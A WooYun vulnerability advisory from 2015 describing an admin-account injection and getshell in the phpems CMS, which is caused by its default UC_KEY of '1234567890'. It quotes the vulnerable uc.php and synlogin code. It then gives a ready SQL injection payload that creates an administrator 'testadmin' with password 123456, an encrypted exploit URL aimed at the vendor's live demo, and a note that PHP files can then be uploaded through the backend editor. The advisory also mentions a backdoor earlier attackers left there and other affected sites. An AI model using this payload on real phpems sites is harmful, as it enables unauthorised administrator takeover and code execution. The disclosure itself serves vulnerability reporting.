当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095619

漏洞标题:phpems设置缺陷直接添加管理员导致getshell

相关厂商:phpems

漏洞作者: Zxsoft

提交时间:2015-02-10 18:54

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

phpems 默认uc_key是1234567890
导致可以用uc的加密函数加密恶意代码带到sql语句中。

详细说明:

if(!defined('IN_UC')) {
	error_reporting(0);
	set_magic_quotes_runtime(0);
	
	defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
	require_once 'config.inc.php';
	$_DCACHE = $get = $post = array();
	$code = @$_GET['code'];       //code=加密代码
	parse_str(_authcode($code, 'DECODE', UC_KEY), $get);  //到这里进行解密
	//var_dump($get);
	if(MAGIC_QUOTES_GPC) {
		$get = _stripslashes($get);  //不明白这里用意,解密后把反斜杠去掉
	}
	$timestamp = time();
	echo $timestamp - $get['time'];
	if($timestamp - $get['time'] > 3600) {  //time可控
		exit('Authracation has expiried');
	}
	if(empty($get)) {
		exit('Invalid Request');
	}
	$action = $get['action']; //action可控
	require_once 'uc_client/lib/xml.class.php';
	$post = xml_unserialize(file_get_contents('php://input'));
	if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) {
		/**
		require_once 'include/db_mysql.class.php';
		$GLOBALS['db'] = new dbstuff;
		$GLOBALS['db']->connect($dbhost, $dbuser, $dbpw, $dbname, $pconnect, true, $dbcharset);
		print_r($GLOBALS['db']);
		$GLOBALS['tablepre'] = $tablepre;
		unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect);
		**/
		$uc_note = new uc_note();
		//file_put_contents('aa.txt','1');
		exit($uc_note->$get['action']($get, $post));
	} else {
		exit(API_RETURN_FAILED);
	}
} else {


uc_note->synlogin

function synlogin($get, $post) {
		$uid = $get['uid'];
		//$username = iconv('gbk','utf-8',$get['username']);
		//gbk版本论坛使用上行
		$username = $get['username'];
		//UTF8版本使用上行
		if(!API_SYNLOGIN) {
			return API_RETURN_FORBIDDEN;
		}
		$sql = "set names utf8";
		$this->dblink->query($sql);
		$sql = "SELECT * FROM ".DTH."user WHERE username = '{$username}'"; //注入点1
		$u = $this->dblink->fetch_first($sql);
		$args = array();
		if(!$u){  //提交个不存在的用户这里$u就为null
			$sql = "SELECT * FROM ".DTH."user_group WHERE groupdefault = '1'";
			$g = $this->dblink->fetch_first($sql);
			$grouid = $g['groupid'];
			$email = $username."@phpems.net";
			$pass = md5(rand(1000,9999));
			$sql = "INSERT INTO ".DTH."user (`username`,`useremail`,`userpassword`,`usergroupid`,`userregtime`,`userregip`) VALUES ('{$username}','{$email}','{$pass}','{$grouid}','".TIME."','".$this->_getClientIp()."')";   //username可控制,是解密后得到的内容 那么就可以直接添加一个管理员
			$this->dblink->query($sql);
			$args = array('sessionuserid'=>$this->dblink->insert_id(),'sessionpassword'=>$pass,'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$grouid,'sessionlogintime'=>TIME,'sessionusername'=>$username);
		}
		else
		$args = array('sessionuserid'=>$u['userid'],'sessionpassword'=>$u['userpassword'],'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$u['usergroupid'],'sessionlogintime'=>TIME,'sessionusername'=>$u['username']);
		if(!$args['sessiontimelimit'])$args['sessiontimelimit'] = TIME;
    	if(!$this->sessionid)$this->_getSessionId();
    	$args['sessionid'] = $this->sessionid;
    	$args['sessiontimelimit'] = TIME;
    	$data = array('session',$args);
    	$sql = $this->_makeReplace($data);
    	$this->dblink->query($sql);


漏洞证明:

官方demo来测试:

phpems.png


现在没有testadmin这个帐号,我们来添加一个
加密这句话然后提交
$str="time=2999999999999999&action=synlogin&username=testadmin','[email protected]','e10adc3949ba59abbe56e057f20f883e','1','2015-02-04','127.0.0.1')#";

jm.png


www.phpems.net/2014/api/uc.php?code=b843/GkLQIWizbadvdy6o9/js/s0OOsDQZq3KhHhyW2nzNTxN6WfQg%2BnwtL3Qbz3YXVpYmC8ibpOgTv9cGHr3TwHHikzy7GtDTEQukPOXPVUzzraPvurp0F78QTp9/ggYXev9PP/iawD/u0lLkhLuf3a2rMZco0l6lbtBQhOC%2BLLKQldXEcjVN0mRV8GrxkEyOBjq0jWVjMuVlzT%2BFNcfqrej0RPozYcWgs0OOsDQZq3KhHhyW2nzNTxN6WfQg
testadmin 密码:123456
前台就可以登陆,然后点击后台管理,都不用找后台
后台编辑器可以直接上传php文件

phpcms1.png


前人用uc key getshell留下的后门

phpems2.png


其他站点:

qt.png


修复方案:

uc_key使用随机字符串

版权声明:转载请注明来源 Zxsoft@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝